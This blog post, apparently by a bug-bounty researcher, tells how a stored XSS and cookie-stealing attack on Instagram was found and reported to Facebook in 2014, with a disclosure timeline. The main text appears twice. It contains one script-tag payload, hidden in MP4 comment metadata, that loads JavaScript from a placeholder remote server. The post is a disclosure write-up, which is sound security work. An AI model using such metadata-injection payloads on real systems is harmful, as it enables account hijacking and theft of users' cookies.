On 26.07. 2014 it was around a month that I was working on an extension for Mozilla
Firefox to bring the instagram mobile app to web browser. after researching in
the video uploading process I have found a bug in the server side scripts through
which I could upload videos longer than 15 seconds to my instagram account, I
created a php script to upload videos longer than 15 seconds and uploaded 3
videos with lengths of 2:09', 1:17', 1:13'. After that I reported to facebook. In
return they asked me for the proof of concept code and I sent the code to them,
they replied to my report as follows:
Thank you for your thoughtful submission. While this is indeed a bug, at this time we feel it is not a security bug so unfortunately it is not eligible for the bounty program. We encourage you to continue to search for more bugs.
I was sure that there is a security bug there so I tried to prove a XSS bug to them.
here I describe how I could hack an instagram account and steal cookies just by opening a video link:
please note that because of their not accepting the bug that I reported about uploading too large or too small videos to instagrm I will not describe any details about how it is vulnerable and how it is possible to bypass their restrictions on video lengths.
the steps were as follows:
1)creating a mp4 video file with length of 208 milliseconds.
2)injecting the video with malicious code, it is possible through mp4 udta atom, to injecting the video in windows os just right click on mp4 video and in details tab in the comments box add this line of JavaScript code:
<html><script src="http://your_remote_server_url/js.js"></script></html>
Then select ok, the video file is ready.
3) Uploading the malicious video...
4) After a successful upload the created link was: http://videos-g-0.ak.instagram.com/hphotos-ak-xaf1/10591347_749153508480280_798124904_n.mp4
before this step I was aware of another bug in their CDNs through which changing the extension of uploaded files was possible, so the final link was:
http://videos-g-0.ak.instagram.com/hphotos-ak-xaf1/10591347_749153508480280_798124904_n.html
the video describes the effect:
https://www.youtube.com/watch?v=F9mPIW3x6ak
after sending my second report the security team from the facebook approved the bug and promised me $1500.
Timeline
Jul 26, 2014 7:08am – Initial report sent
Jul 28, 2014 2:21pm – Request for proof of concept code
Jul 28, 2014 2:49pm – proof of concept code sent
Jul 29, 2014 12:57pm - case closed
Aug 3, 2014 10:42am - second report sent
Aug 5, 2014 7:50am – Acknowledgment of issue by Facebook
Aug 11, 2014 11:33am – Notification of permanent fix by Facebook
Aug 11, 2014 4:55pm – Confirmation of permanent fix sent
Aug 12, 2014 10:22pm – Bounty awarded
Thank you for your thoughtful submission. While this is indeed a bug, at this time we feel it is not a security bug so unfortunately it is not eligible for the bounty program. We encourage you to continue to search for more bugs.
I was sure that there is a security bug there so I tried to prove a XSS bug to them.
here I describe how I could hack an instagram account and steal cookies just by opening a video link:
please note that because of their not accepting the bug that I reported about uploading too large or too small videos to instagrm I will not describe any details about how it is vulnerable and how it is possible to bypass their restrictions on video lengths.
the steps were as follows:
1)creating a mp4 video file with length of 208 milliseconds.
2)injecting the video with malicious code, it is possible through mp4 udta atom, to injecting the video in windows os just right click on mp4 video and in details tab in the comments box add this line of JavaScript code:
<html><script src="http://your_remote_server_url/js.js"></script></html>
Then select ok, the video file is ready.
3) Uploading the malicious video...
4) After a successful upload the created link was: http://videos-g-0.ak.instagram.com/hphotos-ak-xaf1/10591347_749153508480280_798124904_n.mp4
before this step I was aware of another bug in their CDNs through which changing the extension of uploaded files was possible, so the final link was:
http://videos-g-0.ak.instagram.com/hphotos-ak-xaf1/10591347_749153508480280_798124904_n.html
the video describes the effect:
https://www.youtube.com/watch?v=F9mPIW3x6ak
after sending my second report the security team from the facebook approved the bug and promised me $1500.
Timeline
Jul 26, 2014 7:08am – Initial report sent
Jul 28, 2014 2:21pm – Request for proof of concept code
Jul 28, 2014 2:49pm – proof of concept code sent
Jul 29, 2014 12:57pm - case closed
Aug 3, 2014 10:42am - second report sent
Aug 5, 2014 7:50am – Acknowledgment of issue by Facebook
Aug 11, 2014 11:33am – Notification of permanent fix by Facebook
Aug 11, 2014 4:55pm – Confirmation of permanent fix sent
Aug 12, 2014 10:22pm – Bounty awarded
how to send the report to the fb network
ReplyDeleteHow To Report Bug On Instagram? I Not Found This Link/Url Report
ReplyDelete